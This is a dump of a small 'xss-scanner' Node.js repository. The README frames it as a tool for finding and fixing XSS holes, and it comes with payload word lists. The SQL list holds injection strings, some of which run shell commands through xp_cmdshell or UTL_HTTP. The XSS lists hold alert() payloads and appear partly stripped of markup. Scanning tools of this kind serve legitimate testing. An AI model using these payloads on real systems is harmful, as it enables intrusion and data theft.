├── .gitignore ├── .travis.yml ├── LICENSE ├── README.md ├── data ├── payload.sql.txt ├── payload.test.txt └── payload.txt ├── package.json ├── src ├── config.js ├── payload.js └── util.js └── tests └── util.test.js /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | 6 | # Runtime data 7 | pids 8 | *.pid 9 | *.seed 10 | 11 | # Directory for instrumented libs generated by jscoverage/JSCover 12 | lib-cov 13 | 14 | # Coverage directory used by tools like istanbul 15 | coverage 16 | 17 | # nyc test coverage 18 | .nyc_output 19 | 20 | # Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files) 21 | .grunt 22 | 23 | # node-waf configuration 24 | .lock-wscript 25 | 26 | # Compiled binary addons (http://nodejs.org/api/addons.html) 27 | build/Release 28 | 29 | # Dependency directories 30 | node_modules 31 | jspm_packages 32 | 33 | # Optional npm cache directory 34 | .npm 35 | 36 | # Optional REPL history 37 | .node_repl_history 38 | 39 | # Output 40 | output 41 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: node_js 2 | node_js: 3 | - "6" -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Kristofer Krause 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following 
conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # xss-scanner 2 | Cross-Site Scripting (XSS) scanner. This tool helps to find possible XSS vulnerabilities. Its intended use is to help "plug" the vulnerability, *not* exploit it. Be nice. Make the web better. 3 | 4 | [![Build Status](https://travis-ci.org/dragthor/xss-scanner.svg?branch=master)](https://travis-ci.org/dragthor/xss-scanner) [![npm version](https://badge.fury.io/js/xss-scanner.svg)](https://badge.fury.io/js/xss-scanner) 5 | 6 | The three most important countermeasures to prevent cross-site scripting attacks are to: 7 | 8 | * Constrain input. 9 | * Encode output. 10 | * Filter user input. 11 | 12 | URL-encode output URLs if they are constructed from input. 13 | 14 | HTML-encode output if it contains input from the user or from other sources such as databases. 15 | 16 | Cross platform - macOS, Linux, and Windows. It also works on my Raspberry Pi 3 Model B. 17 | 18 | ## Installation 19 | `npm install` 20 | 21 | ## Configuration 22 | Open up the `config.js` file and configure the `xssOptions()` return object. 
23 | 24 | ## Run 25 | `npm start` 26 | 27 | ## Results 28 | The console shows the XSS parameter values that have made it back with a status code 200. You can also dump the resulting Html to a file. Unfortunately, you have to manually check these. I prefer to use the latest version of Firefox with add-ons and extensions disabled. Other XSS tools, such as Burp Suite, also require some manual checking. 29 | 30 | At the top of the Html content, look for a ``. It contains the offending XSS injection payload value. 31 | 32 | ## Additional Resources 33 | 34 | [OWASP XSS Cheatsheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet) 35 | 36 | -------------------------------------------------------------------------------- /data/payload.sql.txt: -------------------------------------------------------------------------------- 1 | ' 2 | a' or 1=1-- 3 | "a"" or 1=1--" 4 | or a = a 5 | a' or 'a' = 'a 6 | 1 or 1=1 7 | a' waitfor delay '0:0:10'-- 8 | 1 waitfor delay '0:0:10'-- 9 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 10 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 11 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 12 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 13 | a' 14 | ? 
15 | ' or 1=1 16 | or 1=1 -- 17 | x' AND userid IS NULL; -- 18 | x' AND email IS NULL; -- 19 | anything' OR 'x'='x 20 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 21 | x' AND members.email IS NULL; -- 22 | x' OR full_name LIKE '%Bob% 23 | 23 OR 1=1 24 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 25 | ' 26 | '%20or%20''=' 27 | '%20or%20'x'='x 28 | %20or%20x=x 29 | ')%20or%20('x'='x 30 | 0 or 1=1 31 | ' or 0=0 -- 32 | " or 0=0 -- 33 | or 0=0 -- 34 | ' or 0=0 # 35 | or 0=0 #" 36 | or 0=0 # 37 | ' or 1=1-- 38 | " or 1=1-- 39 | ' or '1'='1'-- 40 | ' or 1 --' 41 | or 1=1-- 42 | or%201=1 43 | or%201=1 -- 44 | ' or 1=1 or ''=' 45 | or 1=1 or ""= 46 | ' or a=a-- 47 | or a=a 48 | ') or ('a'='a 49 | ) or (a=a 50 | hi or a=a 51 | hi or 1=1 --" 52 | hi' or 1=1 -- 53 | hi' or 'a'='a 54 | hi') or ('a'='a 55 | "hi"") or (""a""=""a" 56 | 'hi' or 'x'='x'; 57 | @variable 58 | ,@variable 59 | PRINT 60 | PRINT @@variable 61 | select 62 | insert 63 | as 64 | or 65 | procedure 66 | limit 67 | order by 68 | asc 69 | desc 70 | delete 71 | update 72 | distinct 73 | having 74 | truncate 75 | replace 76 | like 77 | handler 78 | bfilename 79 | ' or username like '% 80 | ' or uname like '% 81 | ' or userid like '% 82 | ' or uid like '% 83 | ' or user like '% 84 | exec xp 85 | exec sp 86 | '; exec master..xp_cmdshell 87 | '; exec xp_regread 88 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 89 | --sp_password 90 | \x27UNION SELECT 91 | ' UNION SELECT 92 | ' UNION ALL SELECT 93 | ' or (EXISTS) 94 | ' (select top 1 95 | '||UTL_HTTP.REQUEST 96 | 1;SELECT%20* 97 | to_timestamp_tz 98 | tz_offset 99 | <>"'%;)(&+ 100 | '%20or%201=1 101 | %27%20or%201=1 102 | %20$(sleep%2050) 103 | %20'sleep%2050' 104 | char%4039%41%2b%40SELECT 105 | '%20OR 106 | 'sqlattempt1 107 | (sqlattempt2) 108 | | 109 | %7C 110 | *| 111 | %2A%7C 112 | *(|(mail=*)) 113 | %2A%28%7C%28mail%3D%2A%29%29 114 | *(|(objectclass=*)) 115 | %2A%28%7C%28objectclass%3D%2A%29%29 116 | ( 117 | %28 118 | ) 119 | %29 120 | & 121 | 
%26 122 | ! 123 | %21 124 | ' or 1=1 or ''=' 125 | ' or ''=' 126 | x' or 1=1 or 'x'='y 127 | / 128 | // 129 | //* 130 | */* 131 | a' or 3=3-- 132 | "a"" or 3=3--" 133 | ' or 3=3 134 | or 3=3 -- 135 | -------------------------------------------------------------------------------- /data/payload.test.txt: -------------------------------------------------------------------------------- 1 | \"-alert(123456789))// 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | “> 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /data/payload.txt: -------------------------------------------------------------------------------- 1 | \"-alert(123))// 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | “> 10 | 11 | 12 | 13 | ‘; alert(1); 14 | ‘)alert(1);// 15 | 16 | 17 | 18 | 19 | 20 | 21 | 89 | 92 | 93 | click 94 | 95 | 102 | 103 | 104 | 107 | --!> 112 | 113 |
x 114 | "> 115 |